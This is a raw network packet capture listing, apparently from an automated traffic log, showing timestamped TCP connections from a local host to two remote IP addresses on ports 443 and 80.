                                                                                                Oct 27, 2024 17:11:20.204696894 CET57814443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.204713106 CET4435781413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.205502033 CET57816443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.205562115 CET4435781613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.205827951 CET57816443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.205841064 CET4435781613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.206298113 CET57817443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.206319094 CET4435781713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.206598997 CET57817443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.206604004 CET4435781713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.208216906 CET57819443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.208246946 CET4435781913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.208321095 CET57819443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.208445072 CET57819443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.208455086 CET4435781913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.329998016 CET4435781813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.330677032 CET57818443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.330738068 CET4435781813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.330867052 CET4435781513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.331065893 CET57818443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.331084967 CET4435781813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.331099033 CET4435781513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.331152916 CET57815443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.331207037 CET57815443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.331228018 CET4435781513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.331239939 CET57815443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.331245899 CET4435781513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.333786011 CET57820443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.333873987 CET4435782013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.333934069 CET57820443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.334153891 CET57820443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.334189892 CET4435782013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.335623026 CET4435781613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.335671902 CET4435781613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.335726976 CET57816443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.335845947 CET57816443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.335846901 CET57816443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.335877895 CET4435781613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.335902929 CET4435781613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.337934971 CET57821443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.338016987 CET4435782113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.338083029 CET57821443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.338233948 CET57821443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.338268042 CET4435782113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.459228992 CET4435781813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.459485054 CET4435781813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.459557056 CET57818443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.459582090 CET4435781813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.459614038 CET4435781813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.459666014 CET57818443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.459707975 CET57818443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.459729910 CET4435781813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.459752083 CET57818443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.459764957 CET4435781813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.461915970 CET57822443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.461937904 CET4435782213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.462009907 CET57822443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.462157011 CET57822443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.462171078 CET4435782213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.482244968 CET4435781713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.482405901 CET4435781713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.482462883 CET57817443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.482496977 CET57817443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.482513905 CET4435781713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.482526064 CET57817443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.482534885 CET4435781713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.484630108 CET57823443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.484711885 CET4435782313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.484817028 CET57823443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.484957933 CET57823443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.484994888 CET4435782313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.585161924 CET5780880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:20.585432053 CET5782480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:20.590939045 CET8057824152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.591000080 CET8057808152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.591005087 CET5782480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:20.591064930 CET5780880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:20.591247082 CET5782480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:20.596679926 CET8057824152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.965516090 CET4435781913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.966001034 CET57819443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.966012001 CET4435781913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:20.966449976 CET57819443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:20.966455936 CET4435781913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.074886084 CET4435782013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.075388908 CET57820443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.075462103 CET4435782013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.075766087 CET57820443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.075781107 CET4435782013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.092071056 CET4435782113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.092407942 CET57821443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.092464924 CET4435782113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.092750072 CET57821443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.092777014 CET4435782113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.099481106 CET4435781913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.099630117 CET4435781913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.099689007 CET57819443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.099711895 CET57819443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.099730015 CET4435781913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.099740982 CET57819443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.099750042 CET4435781913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.102049112 CET57825443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.102118015 CET4435782513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.102320910 CET57825443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.102320910 CET57825443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.102387905 CET4435782513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.192152023 CET4435782213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.192507982 CET57822443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.192553043 CET4435782213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.192924976 CET57822443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.192935944 CET4435782213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.205306053 CET4435782013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.205473900 CET4435782013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.205544949 CET57820443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.205614090 CET57820443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.205614090 CET57820443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.205651045 CET4435782013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.205673933 CET4435782013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.208038092 CET57826443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.208129883 CET4435782613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.208215952 CET57826443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.208323002 CET57826443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.208354950 CET4435782613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.226114035 CET4435782113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.226250887 CET4435782113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.226315975 CET57821443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.226370096 CET57821443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.226370096 CET57821443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.226404905 CET4435782113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.226428986 CET4435782113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.228241920 CET57827443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.228259087 CET4435782713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.228323936 CET57827443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.228523016 CET57827443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.228537083 CET4435782713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.235824108 CET4435782313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.236160040 CET57823443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.236197948 CET4435782313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.236567020 CET57823443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.236578941 CET4435782313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.321413994 CET4435782213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.321485043 CET4435782213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.321536064 CET57822443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.321557045 CET4435782213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.321595907 CET4435782213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.321657896 CET57822443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.321748018 CET57822443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.321769953 CET4435782213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.321793079 CET57822443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.321820974 CET4435782213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.323811054 CET57828443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.323909998 CET4435782813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.323992968 CET57828443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.324114084 CET57828443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.324142933 CET4435782813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.369474888 CET4435782313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.369631052 CET4435782313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.369782925 CET57823443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.369833946 CET57823443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.369833946 CET57823443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.369865894 CET4435782313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.369888067 CET4435782313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.371768951 CET57829443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.371799946 CET4435782913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.371872902 CET57829443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.371999025 CET57829443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.372014046 CET4435782913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.495649099 CET8057824152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.497133970 CET5782480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:21.841887951 CET4435782513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.893002033 CET57825443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.893028975 CET4435782513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.893341064 CET57825443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:21.893352032 CET4435782513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.973186016 CET4435782613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:21.986083984 CET4435782713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.019720078 CET4435782513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.019789934 CET4435782513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.019929886 CET4435782513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.020153999 CET57825443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.020154953 CET57825443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.022167921 CET57826443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.037698030 CET57827443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.054677963 CET4435782813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.057780981 CET57828443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.057838917 CET4435782813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.058207035 CET57828443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.058224916 CET4435782813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.058417082 CET57826443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.058450937 CET4435782613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.058749914 CET57826443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.058765888 CET4435782613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.058924913 CET57827443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.058948040 CET4435782713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.059232950 CET57827443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.059243917 CET4435782713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.075295925 CET57825443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.075295925 CET57825443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.075326920 CET4435782513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.075351000 CET4435782513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.113032103 CET4435782913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.162796021 CET57829443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.183490038 CET4435782813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.183645964 CET4435782813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.183842897 CET57828443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.188653946 CET4435782613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.188828945 CET4435782613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.188929081 CET57826443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.190120935 CET4435782713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.190517902 CET4435782713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.190587044 CET57827443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.201468945 CET57829443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.201482058 CET4435782913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.201847076 CET57829443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.201852083 CET4435782913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.201948881 CET57827443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.201972008 CET4435782713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.201997042 CET57827443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.202011108 CET4435782713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.280280113 CET57828443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.280325890 CET4435782813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.281707048 CET57826443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.281707048 CET57826443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.281754017 CET4435782613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.281778097 CET4435782613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.327415943 CET4435782913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.327486992 CET4435782913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.327598095 CET4435782913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.327796936 CET57829443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.327796936 CET57829443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.351090908 CET57829443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.351110935 CET4435782913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.351123095 CET57829443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.351129055 CET4435782913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.353682995 CET57830443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.353740931 CET4435783013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.353981018 CET57830443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.355367899 CET57831443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.355392933 CET4435783113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.355441093 CET57831443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.355587006 CET57830443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.355634928 CET4435783013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.357439995 CET57832443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.357511044 CET4435783213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.357584000 CET57832443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.357645988 CET57831443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.357657909 CET4435783113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.357750893 CET57832443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.357784033 CET4435783213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.358191967 CET57833443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.358222008 CET4435783313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.358315945 CET57833443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.358935118 CET57834443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.358956099 CET4435783413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.359019041 CET57834443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.359054089 CET57833443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.359069109 CET4435783313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:22.359146118 CET57834443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:22.359169006 CET4435783413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.008131981 CET5782480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:23.008469105 CET5783580192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:23.014431953 CET8057824152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.014484882 CET5782480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:23.014492035 CET8057835152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.014564991 CET5783580192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:23.015571117 CET5783580192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:23.021012068 CET8057835152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.096196890 CET4435783213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.096451998 CET4435783113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.096661091 CET57832443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.096682072 CET4435783213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.097109079 CET57832443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.097116947 CET4435783213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.097395897 CET57831443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.097423077 CET4435783113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.097799063 CET57831443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.097805977 CET4435783113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.100332975 CET4435783013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.100758076 CET57830443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.100841999 CET4435783013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.101063013 CET57830443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.101089001 CET4435783013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.109884977 CET4435783413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.110191107 CET57834443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.110198975 CET4435783413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.110575914 CET57834443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.110580921 CET4435783413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.117824078 CET4435783313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.118262053 CET57833443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.118273973 CET4435783313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.118578911 CET57833443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.118582964 CET4435783313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.560673952 CET4435783113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.560734987 CET4435783213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.560812950 CET4435783113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.560864925 CET57831443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.560875893 CET4435783213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.560926914 CET57832443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.560951948 CET4435783413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.561019897 CET4435783313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.561086893 CET4435783313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.561111927 CET4435783413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.561136007 CET57833443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.561146021 CET4435783313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.561178923 CET57834443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.561189890 CET4435783313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.561235905 CET57833443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.561275959 CET57831443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.561296940 CET4435783113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.561309099 CET57831443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.561316013 CET4435783113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.561454058 CET4435783013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.561651945 CET4435783013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.561712027 CET57830443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.562130928 CET57833443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.562144995 CET4435783313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.562154055 CET57833443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.562159061 CET4435783313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.563334942 CET57830443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.563334942 CET57830443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.563391924 CET4435783013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.563419104 CET4435783013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.564332008 CET57832443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.564367056 CET4435783213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.564392090 CET57832443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.564409018 CET4435783213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.565143108 CET57834443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:23.565160036 CET4435783413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:23.565181971 CET57834443192.168.2.413.107.246.51
